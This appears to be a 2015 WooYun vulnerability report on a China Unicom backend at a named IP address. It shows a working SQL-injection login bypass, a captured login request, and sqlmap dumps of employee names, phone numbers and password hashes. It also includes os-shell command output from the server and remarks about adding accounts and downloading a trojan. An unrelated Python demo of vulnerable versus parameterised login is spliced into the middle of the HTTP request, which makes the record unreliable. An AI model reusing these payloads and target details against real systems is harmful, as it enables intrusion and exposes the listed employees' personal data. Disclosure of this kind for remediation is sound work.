Vulnerability Summary

Defect ID: wooyun-2015-0123791

Title: Carrier security: China Unicom business backend weak password (account balance can be topped up) + SQL injection with sa privileges

Affected vendor: China Unicom (中国联通)

Author: DloveJ

Submitted: 2015-06-30 20:21

Fixed: 2015-08-17 09:44

Published: 2015-08-17 09:44

Vulnerability type: design flaw / logic error

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-06-30: Details sent to the vendor, awaiting vendor handling
2015-07-03: Vendor confirmed; details visible to the vendor only
2015-07-13: Details opened to core white hats and relevant domain experts
2015-07-23: Details opened to regular white hats
2015-08-02: Details opened to intern white hats
2015-08-17: Details opened to the public

Brief description:

Following in the footsteps of 管管侠..

Detailed description:

0x00

http://220.250.65.185/Index.aspx


This backend can be brute-forced..
But in fact it was entered using the password admin'or'1'='1..
First let's see what functions it has

1.jpg

2.jpg

3.jpg


0x01
Then here

4.jpg


While clicking Query

5.jpg


the response contains employee information.

[masked region]
*****ot;UserID":"songwenjian","UserName":"宋文健","Password":"e6c8ed90d1fcd477fc3c659a78c71811","IsNeedOrderManage":"N","IsNeedReportManage":"Y","IsNeedProductManage":"N","IsNeedCusManage":"N","IsNeedAccountManage":"Y","IsNeedUserManage":"N","IsDel":"N","CreateDt":"\/Date(1423818313000+0800)\/","Telephone":"1"},{"ID":4,"UserID":"baibing","UserName":"白冰","Password":"e6c8ed90d1fcd477fc3c659a78c71811","IsNeedOrderManage":"N","IsNeedReportManage":"Y","IsNeedProductManage":"Y","IsNeedCusManage":"Y","IsNeedAccountManage":"N","IsNeedUserManage":"N","IsDel":"N","CreateDt":"\/Date(1423818186000+0800)\/","Telephone":"18601106560"},{"ID":3,"UserID":"luying","UserName":"卢颖","Password":"0d0589cd78709802a64a9a4580ae6789","IsNeedOrderManage":"Y","IsNeedReportManage":"Y","IsNeedProductManage":"Y","IsNeedCusManage":"Y&*****


[masked region]
*****password*****


0x02
Next, topping up the balance.
We add a user

6.jpg


7.jpg


8.jpg


9.jpg

10.jpg


PS: I have already disabled the account I added.
0x03
Captured the login request

POST /Login.aspx HTTP/1.1
Host: 220.250.65.185
Proxy-Connection: keep-alive
Content-Length: 37
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://220.250.65.185
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://220.250.65.185/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Type=DoLogin&UserID=admin&Password=ad
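The request above submits UserID and Password to Login.aspx, and the report states that the string admin'or'1'='1 was accepted as a credential. The following is an added example, not code from the report or from the application, showing why that works when the server builds its SQL by string concatenation, and the parameterised form that stops it. The Users table, the sample accounts, the MD5 storage and the shape of the DoLogin query are all assumptions made for the demonstration (the report shows 32-hex-character Password values, but not the server code); the database is an in-memory SQLite standing in for the SQL Server instance.

```python
import hashlib
import sqlite3

# Constructed sample accounts standing in for the application's user table.
# The passwords are placeholders chosen here; nothing below comes from the report.
SAMPLE_USERS = [
    ("admin", "Administrator", "placeholder-admin-password"),
    ("clerk", "Clerk", "placeholder-clerk-password"),
]


def md5(s: str) -> str:
    """Unsalted MD5, matching the 32-hex-character Password field seen in the
    leaked JSON (an assumption about the app; shown only to make the demo faithful)."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def build_db() -> sqlite3.Connection:
    """Create an in-memory Users table populated with the constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (UserID TEXT PRIMARY KEY, UserName TEXT, Password TEXT)"
    )
    for user_id, name, pw in SAMPLE_USERS:
        conn.execute("INSERT INTO Users VALUES (?, ?, ?)", (user_id, name, md5(pw)))
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, user_id: str, password: str):
    """Assumed shape of the flawed DoLogin check: user input is pasted into the
    SQL text. With user_id = admin'or'1'='1 the WHERE clause becomes
        UserID='admin' OR ('1'='1' AND Password='<hash>')
    so the admin row matches regardless of the password."""
    sql = (
        "SELECT UserID FROM Users WHERE UserID='" + user_id
        + "' AND Password='" + md5(password) + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def hardened_login(conn: sqlite3.Connection, user_id: str, password: str):
    """Same check with bound parameters: the quote characters in user_id are
    compared as data, so the literal string admin'or'1'='1 matches no account."""
    row = conn.execute(
        "SELECT UserID FROM Users WHERE UserID=? AND Password=?",
        (user_id, md5(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    payload = "admin'or'1'='1"
    print("vulnerable:", vulnerable_login(db, payload, "anything"))   # admin
    print("hardened:  ", hardened_login(db, payload, "anything"))     # None
    print("real login:", hardened_login(db, "admin", "placeholder-admin-password"))
```

The parameterised query removes the injection, but it leaves two other weaknesses the report makes visible: the same hash value appears against many accounts in the sqlmap dump, which is what unsalted, shared passwords look like, and the web application's database login has sa rights, which is what turns a login-form injection into an os-shell. A login-form fix should be paired with salted password hashing and a database account limited to the application's own tables.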


sqlmap

11.jpg


current database:    'Unicom_FlowManage'
available databases [7]:
[*] Biz_NFDPriceTest
[*] DataServiceCenter
[*] master
[*] model
[*] msdb
[*] tempdb
[*] Unicom_FlowManage
| ??? | 23d1814db536145f94aa605f815b5a57 | 18601106528 |
| 10 | ?? | 68e91dc1973dc2178a375e3bca88d742 | 13522274096 |
| 11 | ??? | 68e91dc1973dc2178a375e3bca88d742 | 13501091884 |
| 2 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601106535 |
| 3 | ?? | 0d0589cd78709802a64a9a4580ae6789 | 118601107665 |
| 4 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601106560 |
| 5 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 1 |
| 6 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 1 |
| 7 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 15601206983 |
| 8 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601001288 |
| 9 | ??? | 173d92f1ddf25e9829f44341401fa0ee | 18701624225 |
+----+----------+----------------------------------+--------------+


12.jpg


sqlmap cmd

13.jpg


command standard output:
---
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 192.168.25.202
???? IPv6 ??. . . . . . . . : fe80::ad82:e5a9:7a7:672a%23
????? DNS ?? . . . . . . . :
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . : 192.168.25.254
???? . . . . . . . . . . . . : 255.255.255.0
Windows IP ??
Windows IP ??
????? isatap.{286E22C4-AA4F-4482-9B3E-4B728074EF4E}:
????? isatap.{41BF5F06-D821-443C-A314-49ABA31C8C65}:
????? isatap.{49F8F711-121B-4987-B2C9-8A5C3D2AA8CF}:
????? isatap.{8DB27050-BDB0-464D-ACE0-57ACB1404659}:
????? Teredo Tunneling Pseudo-Interface:
?????? ???? 2:
?????? ???? 5:
?????? ???? 7:
?????? ????:


Via cmd I found the remote port 220.250.65.185:7389
Couldn't add a user

14.jpg


command standard output:
---
========================= ======== ================ =========== ============
========================= ======== ================ =========== ============
BacsTray.exe 3304 2 8,456 K
cmd.exe 3488 Services 0 5,620 K
conhost.exe 5428 Services 0 5,736 K
conhost.exe 6864 Services 0 6,800 K
conhost.exe 8468 Services 0 5,820 K
csrss.exe 908 Services 0 9,472 K
csrss.exe 968 Console 1 8,860 K
csrss.exe 8592 2 15,492 K
DistributedCacheService.e 1524 Services 0 2,250,304 K
dwm.exe 9184 2 7,820 K
explorer.exe 6664 2 66,828 K
fdhost.exe 5420 Services 0 14,392 K
fdlauncher.exe 5300 Services 0 8,432 K
InetMgr.exe 9924 2 56,056 K
LogonUI.exe 972 Console 1 19,476 K
lsass.exe 380 Services 0 73,120 K
lsm.exe 428 Services 0 9,668 K
mmc.exe 6508 2 74,512 K
msdtc.exe 8056 Services 0 10,536 K
MsDtsSrvr.exe 1856 Services 0 42,404 K
MtxHotPlugService.exe 9000 2 6,672 K
MxUp.exe 6224 2 24,080 K
rdpclip.exe 6612 2 12,096 K
services.exe 432 Services 0 17,036 K
smss.exe 748 Services 0 2,548 K
SMSvcHost.exe 2236 Services 0 31,160 K
spoolsv.exe 1436 Services 0 20,664 K
sppsvc.exe 8816 Services 0 12,976 K
SQLAGENT.EXE 11072 Services 0 7,340 K
sqlservr.exe 1520 Services 0 18,540 K
sqlservr.exe 2052 Services 0 667,512 K
sqlwriter.exe 2616 Services 0 10,888 K
Ssms.exe 6504 2 220,632 K
svchost.exe 560 Services 0 16,964 K
svchost.exe 612 Services 0 53,196 K
svchost.exe 616 Services 0 12,240 K
svchost.exe 828 Services 0 117,856 K
svchost.exe 1056 Services 0 21,032 K
svchost.exe 1112 Services 0 27,728 K
svchost.exe 1152 Services 0 31,896 K
svchost.exe 1296 Services 0 18,392 K
svchost.exe 1816 Services 0 12,872 K
svchost.exe 2588 Services 0 5,940 K
svchost.exe 2664 Services 0 18,292 K
svchost.exe 4668 Services 0 13,276 K
svchost.exe 5240 Services 0 8,596 K
svchost.exe 8028 Services 0 7,684 K
System 4 Services 0 364 K
System Idle Process 0 Services 0 24 K
taskeng.exe 6240 2 9,676 K
taskhost.exe 5824 2 9,484 K
tasklist.exe 11192 Services 0 9,928 K
TrustedInstaller.exe 7804 Services 0 174,144 K
w3wp.exe 9148 Services 0 333,176 K
wininit.exe 960 Services 0 7,932 K
winlogon.exe 1000 Console 1 9,152 K
winlogon.exe 2496 2 11,812 K
WmiPrvSE.exe 5028 Services 0 18,616 K
zabbix_agentd.exe 2700 Services 0 21,912 K
???? PID ??? ??# ????
---
os-shell>


That's where it ends.
By the way, could a trojan be downloaded from cmd?? I didn't dare try..

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, cite the source DloveJ@乌云


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-07-03 09:42

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to China Unicom Group, which will coordinate handling with the website's management department.

Latest status:

None yet